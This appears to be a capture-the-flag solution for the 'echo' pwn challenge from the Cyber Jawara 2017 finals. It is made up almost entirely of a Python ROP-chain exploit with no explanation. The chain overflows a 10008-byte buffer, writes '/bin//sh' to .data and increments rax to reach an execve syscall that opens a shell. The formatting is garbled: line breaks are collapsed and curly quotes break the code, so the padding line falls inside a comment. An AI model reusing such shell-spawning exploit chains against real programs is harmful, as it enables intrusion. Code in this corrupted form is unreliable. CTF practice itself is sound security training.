Cyber Jawara 2017 Final - echo (pwn 200) :: /home/rhama/

from struct import pack

# Padding goes here p = 'A' * 10008

p += pack(’<Q', 0x0000000000401817) # pop rsi ; ret p += pack(’<Q', 0x00000000006cb080) # @ .data p += pack(’<Q', 0x0000000000479ce6) # pop rax ; pop rdx ; pop rbx ; ret p += ’/bin//sh' p += pack(’<Q', 0x4141414141414141) # padding p += pack(’<Q', 0x4141414141414141) # padding p += pack(’<Q', 0x00000000004755c1) # mov qword ptr [rsi], rax ; ret p += pack(’<Q', 0x0000000000401817) # pop rsi ; ret p += pack(’<Q', 0x00000000006cb088) # @ .data + 8 p += pack(’<Q', 0x000000000042695f) # xor rax, rax ; ret p += pack(’<Q', 0x00000000004755c1) # mov qword ptr [rsi], rax ; ret p += pack(’<Q', 0x00000000004005d5) # pop rdi ; ret p += pack(’<Q', 0x00000000006cb080) # @ .data p += pack(’<Q', 0x0000000000401817) # pop rsi ; ret p += pack(’<Q', 0x00000000006cb088) # @ .data + 8 p += pack(’<Q', 0x0000000000442d86) # pop rdx ; ret p += pack(’<Q', 0x00000000006cb088) # @ .data + 8 p += pack(’<Q', 0x000000000042695f) # xor rax, rax ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000467920) # add rax, 1 ; ret p += pack(’<Q', 0x0000000000468475) # syscall ; ret print p